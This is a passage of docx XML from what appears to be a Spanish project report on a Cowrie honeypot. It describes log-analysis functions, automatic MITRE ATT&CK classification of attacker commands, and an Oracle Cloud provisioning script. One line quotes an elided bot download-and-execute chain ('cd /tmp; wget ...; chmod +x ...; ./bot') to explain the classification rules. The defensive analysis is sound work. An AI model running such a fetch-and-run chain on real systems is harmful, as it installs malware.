                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IPs únicas y número de sesiones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_logins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.login.failed / success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rankings de usuarios, contraseñas y combinaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comandos más ejecutados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.file_download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">URLs descargadas y hash SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_command_urls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">URLs en comandos aunque la descarga fallase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analyze_timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Actividad diaria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">geolocate_ips</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">País, ciudad e ISP de las IPs (ip-api.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">mapear (mitre_mapping.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1650"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">login.failed / success, command.input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK con evidencias</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 8. Funciones del analizador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La función analyze_command_urls se añadió tras las pruebas con Cowrie real. Cowrie solo registra un evento de descarga cuando el fichero se descarga con éxito, pero en la práctica muchos servidores de malware de las botnets ya han sido retirados cuando el bot ejecuta el comando wget o curl. Esas URLs siguen siendo indicadores de compromiso (IOC) útiles para el informe de inteligencia, así que la función las extrae directamente del texto de los comandos mediante una expresión regular.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clasificación Automática en MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La clasificación de la actividad observada se ha automatizado en un módulo independiente, mitre_mapping.py, que el analizador utiliza en cada ejecución. Hacerlo a mano sobre miles de eventos sería lento y propenso a errores; automatizarlo permite además repetir el análisis cada vez que se descargan logs nuevos durante el periodo de captura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 5), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un comando puede corresponder a varias técnicas. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los bots suelen encadenar órdenes en una sola línea (cd /tmp; wget ...; chmod +x ...; ./bot). Cada regla se evalúa por separado sobre el comando completo, de modo que esa línea suma a la vez a T1105, T1222.002 y T1059.004.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La autenticación se clasifica por tipo de evento, no por texto. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los eventos cowrie.login.failed se asignan a T1110.001 (fuerza bruta) y los cowrie.login.success a T1078.003 (uso de cuentas válidas), con la credencial empleada como evidencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Se cuentan sesiones e IPs, no solo eventos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un mismo bot puede repetir un comando muchas veces en una sesión. El número de sesiones distintas y de IPs distintas que usan cada técnica refleja mejor su prevalencia real entre los atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo que no se clasifica se muestra. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los comandos que no encajan en ninguna regla aparecen en una sección propia del informe para su revisión manual. Así, una técnica que el catálogo no contemple no se pierde en silencio, y la revisión permite ampliar las reglas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El resultado se entrega en tres formatos: una sección del informe de texto agrupada por tácticas en el orden de la matriz de ATT&amp;CK, una gráfica de sesiones por técnica y un fichero CSV (mitre_mapping.csv) con táctica, identificador, nombre, sesiones, eventos, IPs, ejemplo y recomendación, que se abre directamente en una hoja de cálculo y sirve de base para las tablas del informe de inteligencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramienta de Aprovisionamiento en OCI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script oci_a1_retry.py se desarrolló para resolver la falta de capacidad de instancias A1 en la región. Utiliza el SDK oficial de Oracle para Python y se autentica con una clave de API asociada al usuario, cuyo fichero privado permanece en el equipo del administrador y está excluido del repositorio mediante .gitignore. Aunque finalmente Oracle no tuvo capacidad disponible y el proyecto se desplegó en Hetzner Cloud, la herramienta se documenta porque formó parte del trabajo realizado y es reutilizable por cualquier usuario del tier gratuito de Oracle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Su funcionamiento se divide en dos fases. En la primera descubre por sí mismo los datos necesarios: el dominio de disponibilidad, la imagen Ubuntu 24.04 más reciente compatible con A1 (prefiriendo la imagen completa a la mínima) y la subnet pública. Comprueba también si ya existe una instancia con el nombre honeypot-cowrie para no crear duplicados. En la segunda fase solicita la instancia en bucle y trata cada respuesta de la API de forma diferente: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381"/>
        <w:gridCol w:w="2381"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Respuesta de OCI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Significado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Acción del script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">500 «Out of host capacity»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No hay máquinas libres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reintentar tras el intervalo (60 s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
